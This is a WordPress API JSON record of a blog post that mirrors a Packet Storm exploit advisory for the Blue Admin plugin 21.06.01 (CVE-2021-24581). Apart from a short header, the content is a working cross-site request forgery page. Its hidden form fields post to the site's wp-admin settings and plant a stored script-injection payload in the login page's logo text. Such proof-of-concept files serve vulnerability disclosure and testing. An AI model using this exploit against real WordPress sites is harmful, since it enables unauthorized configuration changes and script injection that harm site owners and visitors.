{"id":24351,"date":"2022-05-12T00:28:22","date_gmt":"2022-05-11T20:28:22","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167087\/wpblueadmin210601-xsrf.txt"},"modified":"2022-05-15T09:38:42","modified_gmt":"2022-05-15T05:08:42","slug":"wordpress-blue-admin-21-06-01-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-blue-admin-21-06-01-cross-site-request-forgery\/","title":{"rendered":"WordPress Blue Admin 21.06.01 Cross Site Request Forgery"},"content":{"rendered":"<dl id=\"F167087\" class=\"file first\">\n<dt dir=\"ltr\"><a class=\"ico text-plain\" title=\"Size: 1.3 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/167087\/wpblueadmin210601-xsrf.txt\" target=\"_blank\" rel=\"noopener\"><strong>WordPress Blue Admin 21.06.01 Cross Site Request Forgery<\/strong><\/a><\/dt>\n<dd class=\"datetime\" dir=\"ltr\">Posted <a title=\"16:47:18 UTC\" href=\"https:\/\/packetstormsecurity.com\/files\/date\/2022-05-11\/\" target=\"_blank\" rel=\"noopener\">May 11, 2022<\/a><\/dd>\n<dd class=\"refer\" dir=\"ltr\">Authored by <a class=\"person\" href=\"https:\/\/packetstormsecurity.com\/files\/author\/16317\/\" target=\"_blank\" rel=\"noopener\">Abisheik M<\/a><\/dd>\n<dd class=\"detail\" dir=\"ltr\">WordPress Blue Admin plugin version 21.06.01 suffers from a cross site request forgery vulnerability.<\/dd>\n<dd class=\"tags\" dir=\"ltr\">tags | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/csrf\" target=\"_blank\" rel=\"noopener\">csrf<\/a><\/dd>\n<dd class=\"md5\" dir=\"ltr\">SHA-256 | <code>565e1dfee9a847dbd07998efdff9ee95a2f3f8e9796f37efdf64ce435d785ed9<\/code><\/dd>\n<dd class=\"act-links\" dir=\"ltr\"><a title=\"Size: 1.3 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/167087\/wpblueadmin210601-xsrf.txt\" rel=\"nofollow noopener\" 
target=\"_blank\">Download<\/a> | <a class=\"fav\" href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/167087\/\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/167087\/WordPress-Blue-Admin-21.06.01-Cross-Site-Request-Forgery.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\" dir=\"ltr\">\n<pre><code>Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)\r\nDate: 2021-07-27\r\nExploit Author: Abisheik M\r\nVendor Homepage: https:\/\/wpscan.com\/plugin\/blue-admi\r\nVersion: &lt;= 21.06.01\r\nTested on: Windows 10 Professional\r\nCVE: CVE-2021-24581<\/code><\/pre>\n<pre><code>&lt;html&gt;\n&lt;body&gt;\n&lt;form action=&quot;http:\/\/example.com\/wp-admin\/admin.php?page=blue-admin&amp;tab=blue_admin_login_page&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[fm_bg_color]&quot; value=&quot;FFFFFF&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[fm_color]&quot; value=&quot;777777&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[logo_text]&quot; value='WP&quot;&gt;&lt;script&gt;alert(\/XSS\/)&lt;\/script&gt;' \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[logo_url]&quot; value=&quot;https:\/\/example.com&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[logo_img]&quot; value=&quot;&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[bg_color]&quot; value=&quot;EEEEEE&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[text_color]&quot; value=&quot;222222&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[bg_img]&quot; value=&quot;&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[bg_img_pos]&quot; value=&quot;&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_attr[bg_img_rep]&quot; value=&quot;&quot; \/&gt;\n&lt;input type=&quot;hidden&quot; name=&quot;ba_lp_options_save&quot; value=&quot;Save changes&quot; \/&gt;\n&lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; \/&gt;\n&lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>WordPress Blue Admin 21.06.01 Cross Site Request Forgery Posted May 11, 2022 Authored by Abisheik M WordPress Blue Admin plugin version 21.06.01 suffers from a cross site request forgery vulnerability. tags | exploit, csrf SHA-256 | 565e1dfee9a847dbd07998efdff9ee95a2f3f8e9796f37efdf64ce435d785ed9 Download | Favorite | View Exploit Title: WordPress Plugin Blue Admin 21.06.01 &#8211; Cross-Site Request Forgery (CSRF) Date: 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24351","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24351"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24351\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}